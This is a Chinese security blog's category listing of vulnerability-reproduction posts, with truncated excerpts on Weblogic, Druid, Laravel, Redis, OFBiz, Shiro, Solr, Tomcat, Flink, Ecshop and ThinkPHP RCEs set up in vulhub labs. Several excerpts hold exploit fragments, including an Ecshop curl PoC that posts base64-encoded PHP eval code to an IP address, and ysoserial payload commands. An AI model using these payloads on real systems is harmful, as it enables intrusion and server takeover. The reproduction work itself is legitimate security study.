随笔分类 -  漏洞复现

Weblogic JNDI注入 RCE (CVE-2021-2109) 复现
摘要:#影响范围 Weblogic Server 10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0 #环境搭建 docker pull ismaleiva90/weblogic12 docker run -d -p 49163:7001 -p 4 阅读全文
posted @ 2021-04-11 15:54 Stunmaker 阅读(617) 评论(0) 推荐(0)
ntopng权限绕过漏洞 (CVE-2021-28073) 复现
摘要:#0x01影响范围 ntopng commit < e8b9721479f401f595c5c7bb151819aceb03ad71 #0x02 环境搭建 https://github.com/vulhub/vulhub/tree/master/ntopng/CVE-2021-28073 docke 阅读全文
posted @ 2021-04-10 12:28 Stunmaker 阅读(768) 评论(0) 推荐(0)
Apache Druid 命令执行漏洞(CVE-2021-25646) 复现
摘要:#0x01 漏洞概述 在Druid 0.20.0及更低版本中,用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。攻击者可直接构造恶意请求执行任意代码,控制服务器。 #0x02 影响范围 Apache Druid < 0.20.1 #0x03 环境搭建 docker拉取镜像并运行容器 阅读全文
posted @ 2021-04-10 12:01 Stunmaker 阅读(380) 评论(0) 推荐(0)
Laravel-Ignition2.5.1 (CVE-2021-3129) RCE
摘要:#0x01 影响范围 Laravel 框架 < 8.4.3 facade ignition 组件 < 2.5.2 #0x02环境搭建 vulhub拉取镜像 cd /vulhub/laravel/CVE-2021-3129 docker-compose up -d #0x03复现 python3 ex 阅读全文
posted @ 2021-04-09 12:03 Stunmaker 阅读(220) 评论(0) 推荐(0)
Lanproxy 任意文件读取漏洞 (CVE-2021-3019) 复现
摘要:#0x01 漏洞触发条件 通过…/绕过读取任意文件。该漏洞允许目录遍历读取/…/conf/config.properties来获取到内部网连接的凭据。 #0x02 漏洞影响版本 Lanproxy1.0 #0x03 环境搭建 下载Lanproxy1.0压缩包,下载地址: https://file.ni 阅读全文
posted @ 2021-04-09 11:42 Stunmaker 阅读(291) 评论(0) 推荐(0)
Redis 4.x/5.x 未授权访问漏洞复现
摘要:#0x01环境搭建 cd /vulhub/redis/4-unacc docker-compose up -d 6379端口打开 #0x02漏洞复现 ###使用redis-rogue-server工具。使用该工具将在终端伪造一个redis服务并尝试与目标连接实现未授权访问 git clone htt 阅读全文
posted @ 2021-04-04 22:19 Stunmaker 阅读(261) 评论(0) 推荐(0)
Apache Ofbiz XMLRPC (CVE-2020-9496)RCE 复现
摘要:#0x01 docker拉取镜像 cd /vulhub/ofbiz/CVE-2020-9496 sudo docker-compose up -d #0x02复现 ##进入ysoserial目录使用maven下载并编译需要的包 mvn clean package -DskipTests ##ysos 阅读全文
posted @ 2021-04-04 22:06 Stunmaker 阅读(361) 评论(0) 推荐(0)
Apache OFBiz 反序列化漏洞(CVE-2021-26295 )复现
摘要:#0x01影响范围 Apache OFBiz < 17.12.06 #0x02漏洞复现步骤 ##ysoserial生成URLDNS利用链 java -jar ysoserial.jar URLDNS http://***.dnslog.cn > dns.ot #Encode得到的dns.ot enc 阅读全文
posted @ 2021-04-04 00:20 Stunmaker 阅读(506) 评论(0) 推荐(0)
Apache Shiro 1.2.4反序列化漏洞复现
摘要:#0x01. #0x02.复现 1.反序列化工具ysoserial下载需要的模块 出现BuildSuccess即成功(kali默认使用openjdk,不配置$JAVA_HOME废了半天劲才Build成功) 目录下出现ysoserial-0.0.6-SNAPSHOT-all.jar 2.使用ysose 阅读全文
posted @ 2021-03-26 15:12 Stunmaker 阅读(281) 评论(0) 推荐(0)
Apache-Solr 任意文件读取漏洞复现
摘要:#0x01. 1.创建一个新的项目 2.POC读取core信息 http://IP:port/solr/admin/cores?indexInfo=false&wt=json 3.获取new_core POST /solr/new_core/config HTTP/1.1 Host: your ip 阅读全文
posted @ 2021-03-25 15:11 Stunmaker 阅读(312) 评论(0) 推荐(0)
Apache Skywalking Rce复现
摘要:#0x01.漏洞成因 Skywalking 历史上存在两次SQL注入漏洞,CVE-2020-9483、CVE-2020-13921。此次漏洞(Skywalking小于v8.4.0)是由于之前两次SQL注入漏洞修复并不完善,仍存在一处SQL注入漏洞。结合 h2 数据库(默认的数据库),可以导致 RCE 阅读全文
posted @ 2021-03-17 19:27 Stunmaker 阅读(1152) 评论(0) 推荐(0)
Tomcat 8.x弱口令获取manager权限上传任意war包漏洞复现
摘要:#0x01.指纹识别 拿到环境之后引入眼帘的是Tomcat 8.0.43 并不知道有些什么洞,searchsploit走一下 #0x02.找错了洞 搜索相关漏洞,发现了CVE-2017-12615,需要后台在web.xml添加readonly字段并更改值为false(默认为true)默认开启状态会r 阅读全文
posted @ 2021-03-12 22:28 Stunmaker 阅读(1127) 评论(0) 推荐(0)
Apache Flink Dashboard 任意jar包上传 Rce复现
摘要:#0X01.漏洞原理 攻击者可利用该漏洞在 Apache Flink Dashboard页面中上传任意Jar包,利用Metasploit在Apache Flink服务器中执行任意代码,获取服务器最高权限,所以危害性较大。 #0X02.漏洞复现 需要生成一个公网的IP地址exploit才能正常接收到m 阅读全文
posted @ 2021-03-11 12:37 Stunmaker 阅读(1173) 评论(0) 推荐(0)
Ecshop RCE x2
摘要:#ECSHOP ⇐2.7x RCE ##指纹识别 ##漏洞复现 POC:终端执行 curl http:/45.76.55.7:8080/user.php -d 'action=login&vulnspy=eval(base64_decode($_POST[d]));exit;&d=ZmlsZV9wd 阅读全文
posted @ 2021-02-22 13:43 Stunmaker 阅读(330) 评论(0) 推荐(0)
Thinkphp Rce复现X3
摘要:#Thinkphp 5.0.23 rce ##1.网页指纹识别 使用whatweb扫描结果 网站使用的php版本是7.2.12,Apache2.4.25 ###Php漏洞 searchsploit扫描结果 漏洞复现参考:https://www.uedbox.com/post/59402/ ###Ap 阅读全文
posted @ 2021-02-08 18:22 Stunmaker 阅读(323) 评论(0) 推荐(0)
Python-flask-ssti
摘要:#Flask的特点 Part1:所有的flask应用在初始化时都必须创建程序实例,程序实例就是falsk的对象。falsk类只有一个必须指定的参数,即程序主模块或者包的名字。 Part2:客户端发送Url给Web服务器,服务器将Url转发给falsk程序实例。程序实例需要知道对于每一个Url请求启动 阅读全文
posted @ 2021-02-05 18:51 Stunmaker 阅读(100) 评论(0) 推荐(0)